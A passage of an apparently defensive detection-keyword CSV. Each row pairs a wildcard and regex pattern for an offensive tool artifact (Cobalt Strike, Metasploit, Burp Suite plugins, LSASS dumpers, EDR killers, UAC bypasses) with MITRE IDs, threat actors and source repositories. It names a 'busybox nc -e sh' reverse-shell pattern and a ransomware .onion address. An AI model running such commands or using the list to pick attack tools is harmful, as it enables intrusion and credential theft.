penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","36395" "*bupload_raw*.dll*",".{0,1000}bupload_raw.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","N/A","10","10","192","31","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z","36396" "*burl http://ipinfo.io 2>/dev/null*",".{0,1000}burl\shttp\:\/\/ipinfo\.io\s2\>\/dev\/null.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","0","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","36397" "*burnett_top_1024.txt*",".{0,1000}burnett_top_1024\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36398" "*Burp Suite*",".{0,1000}Burp\sSuite.{0,1000}","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://portswigger.net/burp","1","0","N/A","network exploitation tool","N/A","N/A","N/A","N/A","N/A","N/A","36399" "*burp*PayloadParser.py*",".{0,1000}burp.{0,1000}PayloadParser\.py.{0,1000}","offensive_tool_keyword","burpsuite","PayloadParser - Burp Suite NMap Parsing Interface in Python","T1583 - T1595 - T1190","TA0001 - TA0003 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/infodel/burp.extension-payloadparser","1","1","N/A","network exploitation tool","N/A","1","4","4","2013-03-15T20:41:45Z","2013-03-15T20:39:23Z","36400" "*burp*SQLMapper.xml*",".{0,1000}burp.{0,1000}SQLMapper\.xml.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/JGillam/burp-co2","1","1","N/A","network exploitation 
tool","N/A","2","152","34","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z","36401" "*burp.extension-payloadparser*",".{0,1000}burp\.extension\-payloadparser.{0,1000}","offensive_tool_keyword","burpsuite","PayloadParser - Burp Suite NMap Parsing Interface in Python","T1583 - T1595 - T1190","TA0001 - TA0003 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/infodel/burp.extension-payloadparser","1","1","N/A","network exploitation tool","N/A","1","4","4","2013-03-15T20:41:45Z","2013-03-15T20:39:23Z","36402" "*burp_log_*.log*",".{0,1000}burp_log_.{0,1000}\.log.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","36403" "*Burp_start.bat*",".{0,1000}Burp_start\.bat.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","network exploitation tool","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","36404" "*Burp_start_en.bat*",".{0,1000}Burp_start_en\.bat.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","network exploitation tool","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","36405" "*burp2malleable.*",".{0,1000}burp2malleable\..{0,1000}","offensive_tool_keyword","cobaltstrike","Quick python utility I wrote to turn HTTP requests from burp suite into Cobalt Strike Malleable C2 
profiles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CodeXTF2/Burp2Malleable","1","1","N/A","N/A","10","10","385","34","2023-04-06T15:24:12Z","2022-08-14T18:05:39Z","36406" "*burp-co2/out/artifacts*",".{0,1000}burp\-co2\/out\/artifacts.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/JGillam/burp-co2","1","1","N/A","network exploitation 
tool","N/A","2","152","34","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z","36407" "*BurpCO2Suite.xml*",".{0,1000}BurpCO2Suite\.xml.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/JGillam/burp-co2","1","1","N/A","network exploitation tool","N/A","2","152","34","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z","36408" "*burpcollaborator.net*",".{0,1000}burpcollaborator\.net.{0,1000}","offensive_tool_keyword","burpsuite","Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. This tool is not free and open source","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://portswigger.net/burp","1","1","N/A","network exploitation tool","N/A","N/A","N/A","N/A","N/A","N/A","36409" "*BurpFunctions.java*",".{0,1000}BurpFunctions\.java.{0,1000}","offensive_tool_keyword","burpsuite","A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/nccgroup/BurpSuiteHTTPSmuggler","1","1","N/A","network exploitation tool","N/A","8","721","107","2019-05-04T06:15:42Z","2018-07-03T07:47:58Z","36410" "*burpitem.py*",".{0,1000}burpitem\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - 
TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","36411" "*burplog.py*",".{0,1000}burplog\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","36412" "*burp-log4shell.jar*",".{0,1000}burp\-log4shell\.jar.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","1","N/A","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","36413" "*BurpShiroPassiveScan.jar*",".{0,1000}BurpShiroPassiveScan\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","network exploitation tool","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","36414" "*burpstate.py*",".{0,1000}burpstate\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","36415" "*Burpsuite*",".{0,1000}Burpsuite.{0,1000}","offensive_tool_keyword","burpsuite","Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. 
This tool is not free and open source","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://portswigger.net/burp","1","1","N/A","network exploitation tool","N/A","N/A","N/A","N/A","N/A","N/A","36416" "*burpsuite*.exe*",".{0,1000}burpsuite.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://portswigger.net/burp","1","1","N/A","network exploitation tool","N/A","N/A","N/A","N/A","N/A","N/A","36417" "*burpsuite*.jar*",".{0,1000}burpsuite.{0,1000}\.jar.{0,1000}","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://portswigger.net/burp","1","1","N/A","network exploitation tool","N/A","N/A","N/A","N/A","N/A","N/A","36418" "*burpsuite*.sh*",".{0,1000}burpsuite.{0,1000}\.sh.{0,1000}","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://portswigger.net/burp","1","1","N/A","network exploitation tool","N/A","N/A","N/A","N/A","N/A","N/A","36419" "*burpsuite*.zip*",".{0,1000}burpsuite.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. 
and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://portswigger.net/burp","1","1","N/A","network exploitation tool","N/A","N/A","N/A","N/A","N/A","N/A","36420" "*BurpSuiteCn.jar*",".{0,1000}BurpSuiteCn\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","network exploitation tool","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","36421" "*BurpSuiteHTTPSmuggler*",".{0,1000}BurpSuiteHTTPSmuggler.{0,1000}","offensive_tool_keyword","burpsuite","A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/nccgroup/BurpSuiteHTTPSmuggler","1","1","N/A","network exploitation tool","N/A","8","721","107","2019-05-04T06:15:42Z","2018-07-03T07:47:58Z","36422" "*BurpSuite-SecretFinder*",".{0,1000}BurpSuite\-SecretFinder.{0,1000}","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","N/A","10","2153","405","2024-05-26T09:36:41Z","2020-06-08T10:50:12Z","36423" "*burp-vulners-scanner-*.jar*",".{0,1000}burp\-vulners\-scanner\-.{0,1000}\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - 
T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","network exploitation tool","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","36424" "*burp-xss-sql-plugin*",".{0,1000}burp\-xss\-sql\-plugin.{0,1000}","offensive_tool_keyword","burpsuite","find several bugbounty-worthy XSSes. OpenRedirects and SQLi.","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/attackercan/burp-xss-sql-plugin","1","1","N/A","network exploitation tool","N/A","1","44","12","2016-09-28T21:46:18Z","2016-08-17T14:05:24Z","36425" "*buster -e * -f john -l doe -b '****1989'*",".{0,1000}buster\s\-e\s.{0,1000}\s\-f\sjohn\s\-l\sdoe\s\-b\s\'.{0,1000}.{0,1000}.{0,1000}.{0,1000}1989\'.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","36426" "*busterPayloads.txt*",".{0,1000}busterPayloads\.txt.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","36427" "*busybox nc * -e sh*",".{0,1000}busybox\snc\s.{0,1000}\s\-e\ssh.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- 
TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","36428" "*bWFsd2FyZQ==*",".{0,1000}bWFsd2FyZQ\=\=.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","36430" "*bwjbbpbcihglahwxxusmyy2nxqdc4oqy4rvyhayn4dxhqzji4qi7taid.onion*",".{0,1000}bwjbbpbcihglahwxxusmyy2nxqdc4oqy4rvyhayn4dxhqzji4qi7taid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","36431" "*bWltaWthdHo=*",".{0,1000}bWltaWthdHo\=.{0,1000}","offensive_tool_keyword","BetterSafetyKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","36432" "*bWltaWthdHo=*",".{0,1000}bWltaWthdHo\=.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - 
T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","36433" "*bWV0YXNwbG9pdA==*",".{0,1000}bWV0YXNwbG9pdA\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","36434" "*bXl6LnhjZ0BnbWFpbC5jb20=*",".{0,1000}bXl6LnhjZ0BnbWFpbC5jb20\=.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","N/A","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","36435" "*by 
@ricardojoserf*",".{0,1000}by\s\@ricardojoserf.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","36436" "*By b4rtik & uf0*",".{0,1000}By\sb4rtik\s\&\suf0.{0,1000}","offensive_tool_keyword","ATPMiniDump","Dumping LSASS memory with MiniDumpWriteDump on PssCaptureSnapShot to evade WinDefender ATP credential-theft. Take a look at this blog post for details. ATPMiniDump was created starting from Outflank-Dumpert then big credits to @Cneelis","T1003 - T1005 - T1055 - T1218","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/b4rtik/ATPMiniDump","1","0","#content","N/A","N/A","3","255","46","2019-12-02T15:01:22Z","2019-11-29T19:49:54Z","36437" "*By Cn33liz and Skons 2018*",".{0,1000}By\sCn33liz\sand\sSkons\s2018.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an 'all in one' Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some of). and that has all relevant tooling included. 
You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","36438" "*By Cneeliz @Outflank 2019*",".{0,1000}By\sCneeliz\s\@Outflank\s2019.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#content","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","36439" "*byakugan/bin/*",".{0,1000}byakugan\/bin\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36440" "*Bye_Explorer.ino*",".{0,1000}Bye_Explorer\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interface device ( HID attacks ). Penetration With Teensy","T1056.001 - T1200 - T1036 - T1071","TA0002 - TA0005 - TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","N/A","2","143","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z","36441" "*byinarie/teams_dump*",".{0,1000}byinarie\/teams_dump.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","1","N/A","N/A","7","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","36442" "*byinarie/teams_dump*",".{0,1000}byinarie\/teams_dump.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1555 - T1003 - T1114","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","1","N/A","N/A","9","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","36443" 
"*BYOVD_kill_av_edr.*",".{0,1000}BYOVD_kill_av_edr\..{0,1000}","offensive_tool_keyword","BYOVD_kill_av_edr","BYOD to kill AV/EDR","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/BYOVD_kill_av_edr.c","1","1","N/A","N/A","10","3","299","55","2024-08-08T06:11:06Z","2023-01-15T22:37:34Z","36444" "*Bypass Success! Now impersonating the forged token*",".{0,1000}Bypass\sSuccess!\sNow\simpersonating\sthe\sforged\stoken.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","0","#content","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","36445" "*Bypass Success! Now impersonating the forged token* Loopback network auth should be seen as elevated now*",".{0,1000}Bypass\sSuccess!\sNow\simpersonating\sthe\sforged\stoken.{0,1000}\sLoopback\snetwork\sauth\sshould\sbe\sseen\sas\selevated\snow.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense 